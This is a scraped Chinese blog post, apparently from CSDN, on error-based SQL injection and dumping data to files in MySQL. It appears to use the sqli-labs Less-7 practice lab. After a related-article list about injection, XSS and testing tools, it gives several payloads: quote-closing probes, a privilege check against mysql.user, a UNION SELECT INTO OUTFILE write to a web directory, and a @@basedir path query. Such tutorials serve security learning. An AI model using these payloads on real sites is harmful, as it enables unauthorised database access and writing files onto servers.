web渗透——SQL注入文件dump

原创 2018年04月15日 20:37:05

0x00前言

这次注入主要是针对PHP来说的。如果通过dump错误命令来进行错误盲注。

0x01 前置知识

outfile函数

说明

将表的内容到处为一个文本文件。

格式

select [列名] FROM table [where 语句] into outfile ‘目标文件’ [OPTION]

dumpfile

将表的内容导出为一个文本文件,一次到处一行

load_file

将数据导入mysql

0x02 知识

尝试判断:

(1)’–+
(2)’)–+
(3)’))–+

权限测试:

and (select count(*)from mysql.user)>0 --+

outfile测试:

id=1')) union select 1,2,3 into outfile 'D:/phpStudy/www/sqli-labs-master/less-7/1.txt'

获取mysql的绝对路径

select @@basedir as basePath from dual
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_36869808/article/details/79952905

渗透攻防Web篇-SQL注入攻击初级

前言 不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞...
  • supernewer1995
  • supernewer1995
  • 2016-09-21 21:07:38
  • 778

渗透攻防Web篇-SQL注入攻击初级 1

Preface不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一,...
  • ZmeiXuan
  • ZmeiXuan
  • 2017-08-03 23:28:11
  • 418

Web安全渗透自学

Web 应用程序(Web Applications)是指通过 Web 浏览器访问的任何应用程序。它基于 Web 运行,是典型的浏览器--服务器架构的产物。...
  • CHS007chs
  • CHS007chs
  • 2014-08-14 09:17:44
  • 2024

渗透攻防web篇-sql注入攻击中级

Preface 找到SQL注入漏洞后,我们可以用它来干什么呢?那么本篇文章给大家带来的就是SQL注入漏洞利用技术,现在是时候让我们去体验一下漏洞利用的乐趣了。 目录 第三节 利用SQL注入 3.1...
  • ZmeiXuan
  • ZmeiXuan
  • 2017-08-05 21:58:18
  • 444

web渗透-SQL注入数据库信息盗取

sql注入原理 脚本代码接收来自前端数据未进行过滤,导致恶意sql语句插入到数据库中查询执行。 如下代码: sql注入攻击流程 1.and语法判断是否存在注入点...
  • chuan442616909
  • chuan442616909
  • 2017-02-28 21:22:14
  • 527

【白帽子讲web安全】关于XSS,CSRF,SQL注入

1.XSS 分类:      1.反射型:给用户发送页面或者链接,让用户点击来进行攻击      2.存储型:把攻击存放在服务端,可能造成传播(比如博客系统,每个访问该页面的人都有可能被攻击),主动性...
  • natsuyu
  • natsuyu
  • 2016-05-29 22:29:10
  • 1041

PHP伪静态与防注入

PHP伪静态,主要是为了隐藏传递的参数名;于网上搜索后整理伪静态四法 代码 Code highlighting produced by Actipro CodeHighlighter (...
  • k8080880
  • k8080880
  • 2015-04-09 21:15:18
  • 680

渗透常用SQL注入语句大全

1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0 and 0 3....
  • woshihaiyong168
  • woshihaiyong168
  • 2016-09-07 08:31:47
  • 370

《Metasploit渗透测试魔鬼训练营》 之 SQL注入

知其然,知其所以然。本系列文章是对《Metasploit渗透测试魔鬼训练营》学习感悟的总结,特别是对书中不明确和没有挖掘原理的部分进行了讲解。一来是对自己的提醒,二来是希望对即将学习本书的人一个帮助和...
  • duangduang2020
  • duangduang2020
  • 2015-10-07 12:51:31
  • 1393

SQL注入测试工具:Pangolin(穿山甲)

第一章、简介   1.1 Pangolin是什么? Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。 所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控...
  • yefan2222
  • yefan2222
  • 2011-12-20 12:51:11
  • 35193
收藏助手
不良信息举报
您举报文章:web渗透——SQL注入文件dump
举报原因:
原因补充:

(最多只允许输入30个字)